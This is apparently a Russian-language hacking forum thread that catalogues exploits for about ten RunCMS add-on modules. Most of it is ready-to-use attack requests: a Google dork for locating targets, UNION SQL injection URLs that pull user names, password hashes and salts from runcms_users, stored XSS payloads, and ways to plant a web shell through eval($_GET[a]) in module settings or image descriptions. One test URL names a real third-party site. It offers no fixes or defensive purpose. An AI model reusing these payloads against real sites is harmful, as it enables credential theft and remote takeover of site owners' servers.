![]() |
RunCMS Module eBlog 0.1 Blind-SQL
Уязвимый продукт: Module eBlog Версия: <= 0.1 Линк: http://www.runcms.ru/modules/files/showfile.php?lid=165 Дорк: "inurl:modules/eblog/" Blind-SQL Уязвимость в файле index.php. Уязвимый кусок кода: PHP код:
Код:
true: /modules/eblog/index.php?cat=1+and+1=1Код:
true: http://utahvalleyonline.com/ourplace/modules/eblog/index.php?cat=12+and+substring(version(),1,1)=5 |
Уязвимости модулей RunCMS
XtremGuestbook
Версия: 1.2 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=194 SQL-INJ Уязвимый скрипт: /modules/xtremuserguestbook/index1.php Запрос: /modules/xtremuserguestbook/index1.php?gbid=2&op=Messageedit&idmsg=-1+union+select+1,uname,pwdsalt,pass,5,6,7+from+run cms_users Параметр gbid - айди текушего юзера Уязвимый кусок кода: Не знаю, что это за стеб, видимо тут должна была быть проверка на административные права, но получилось вот так .. PHP код:
PHP код:
PHP код:
Активная XSS Уязвимо поле E-mail mymail@asdasd.ru'><script>alert()</script><' Заливка шелла через конфиг Зависимость: на папку /modules/xtremuserguestbook/cache должны стоять 777 чмоды (я к примеру забыл их поставить)) Уязвимый скрипт: /modules/xtremuserguestbook/conf.php Запрос: /modules/xtremuserguestbook/conf.php?gbid=2&op=Config Заюзаем поле _XTUG_NBMSGBYPAGE - 10;eval($_GET[a]);// и сохраняем настройки, они сохранятся в cache/2.php где 2 - наш айди Уязвимый кусок кода: Так же, как и в случае со скулей, идет не понятная проверка PHP код:
PHP код:
PHP код:
|
MyAnnonces
Версия: 1.7 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=94 SQL-INJ Уязвимый скрипт: addannonces.php Запрос: /modules/MyAnnonces/addannonces.php?op=addindex&cid=-1+union+select+pass,2+from+runcms_users Вместо pass поочереди подставляем uname,pwdsalt, т.к. concat заюзать не получится - срабатывает мегахаксорная зашита) Уязвимый кусок кода: Уязвимость можно проэксплуатировать только, если есть хоть 1 категория. PHP код:
PHP код:
Уязвимый скрипт: annonces-p-f.php Зависимость: magic_quotes = off Запрос: /modules/MyAnnonces/annonces-p-f.php?op=EnvAnn&lid='+union+select+uname,pwdsalt,p ass+from+runcms_users%23 Уязивмый кусок кода: PHP код:
Запрос: /modules/MyAnnonces/annonces-p-f.php?op=MailAnn&yname=&ymail=&fname=&fmail=blacksun@xakep.ru&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users На указанный email придет письмо вида Код:
Hello ,PHP код:
Можно обойтись и без отсылки на мыло) Запрос: /modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uname,pwdsalt,5,6,7,8,9,10,1 1,12,13+from+runcms_users Уязвимый кусок кода: PHP код:
Уязвимый скрипт: contact.php Зависимость: magic_quotes = off Запрос: /modules/MyAnnonces/contact.php?submit=1&id=-1'+union+select+'blacksun@xakep.ru',2,pass,uname,pwdsalt+from+runcms_users%23 Уязвимый кусок кода: PHP код:
|
BamaGalerie
Версия: 3.0.1 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=282 Раскрытие путей /modules/bamagalerie3/makegoback.php?galerieConfig[page_type]=bama_page /modules/bamagalerie3/navig_cat_show.php /modules/bamagalerie3/include/copy_one_img.php?galerieConfig[page_type]=bama_page ^ а так же половина скриптов с той же папки (include) SQL-INJ Уязвимый скрипт: rateimg.php Запрос: /modules/bamagalerie3/rateimg.php?id=-1+union+select+pass+from+runcms_users Уязвимый кусок кода: PHP код:
MiniGal Версия: 0.51 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=491 Активная XSS Добавить коментарий > уязвимо поле name: <script>alert()</script> Заливка шелла с админки модуля - Заливаем картинку, затем редактируем Description: <?eval($_GET[a]);?> Шелл будет в файле mg2db_idatabase.php |
Цитата:
Версия: 1.0 Скачать: http://www.runcms.ru/modules/files/visit.php?lid=302 SQL-INJ Уязвимый скрипт: newcomment.php Запрос: /modules/myalbum/newcomment.php?item_id=-1+union+select+pass+from+runcms_users%23 Уязвимый кусок кода: Фактически целиком весь файл PHP код:
(Скулю не добил, у меня какие то проблемы с модулем ..) Запрос: /modules/myalbum/photo.php?lid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13%23 Уязвимый кусок кода: PHP код:
Запрос: /modules/myalbum/ratephoto.php?lid=-1+union+select+pass+from+runcms_users Уязвимый кусок кода: PHP код:
Уязвимый скрипт: viewcat.php Запрос: /modules/myalbum/viewcat.php?cid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12%23 Уязвимый кусок кода: PHP код:
|
eBlog
Версия: 0.3 Заходим, создаем свой блог, добавляем запись .. Уязвимый скрипт: blogentry.php Запрос: blogentry.php?op=edit&text_id=-1+union+select+1,pass,pwdsalt,4+from+runcms_users+limit+0,1 Где выделенная еденица - айди вашего блога Уязвимый кусок кода: PHP код:
Уязвимо поле имя блога |
Event Calendar
Версия: 2.4 Уязвимый скрипт: display.php Запрос: /modules/ecal/display.php?year1=&month1=&day1=&katid=-1+union+select+pass,2+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/localleve.php?lid=-1+union+select+pass+from+runcms_users%23 Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/location.php?lid=-1+union+select+1,2,3,uname,5,pass,pwdsalt,8,9,10,1 1+from+runcms_users Уязвимый кусок кода: PHP код:
Зависимость: magic_quotes = off Запрос: /modules/ecal/modifevent.php?id=-1'+union+select+1,2,uname,4,5,6,pass,pwdsalt,9,10, 11,12,13,14+from+runcms_users%23 Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/remind.php?op=remindadd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/ecal/teilnehmen.php?op=teiladd&id=-1+union+select+1,2,3,4,5,6,pass,8,9,10,11,12,13,14 +from+runcms_users Уязвимый кусок кода: PHP код:
|
Friendfinder
Версия: 3.02 Уязвимый скрипт: search.php Запрос: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&ag etill=19+union+select+1,uname,pwdsalt,4,0x31322e31 322e31393939,pass+from+runcms_users%23&sex=&partne r=&state=&category=&sort= Уязвимый кусок кода: PHP код:
Зависимость: magic_quotes = off Запрос: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,1 1,12,13,14,0x31322e31322e31393939,16,17,19,20,21,2 2+from+runcms_users%23 Уязвимый кусок кода: PHP код:
|
googlestats
Версия: 2 Уязвимый скрипт: info-robot.php Запрос: /modules/googlestats/info-robot.php?robot=-1+union+select+1,2,pass,pwdsalt,5,uname,7,8,9,10+f rom+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/googlestats/index.php?rub=&robot=-1+union+select+pass+from+runcms_users%23&s=06&d=20 090202 Уязвимый кусок кода: PHP код:
|
HotNews
Версия: 2 Уязвимый скрипт: rate.php Запрос: /modules/HotNews/rate.php?tid=-1+union+select+1,pass+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=viewexttutorial&tid=-1+union+select+pass+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=viewtutorial&tid=-1+union+select+1,2,uname,4,pass,6,7,8,9+from+runcm s_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=listHotNews&cid=-1+union+select+1,pass,3+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/?op=printpage&tid=-1+union+select+1,2,pass,4+from+runcms_users Уязвимый кусок кода: PHP код:
Запрос: /modules/HotNews/submit.php?op=addTutorial&cid=-1+union+select+1,uname,pass,4+from+runcms_users Уязвимый кусок кода: PHP код:
Уязвимый скрипт: upload.php Скрипт не проверяет типа файла \ расширение поэтому возможно можно залить шелл в папку images, либо в любую другую, передав соотвествующий путь в переменной img_path ( Хотя у меня на локале не заливались даже картинки, поэтому проверить не смог .. впрочем, если расширение и проверяется, то можно залить шелл с раширением .jpg, но img_path=/shell.php%00 ) |
| Время: 10:31 |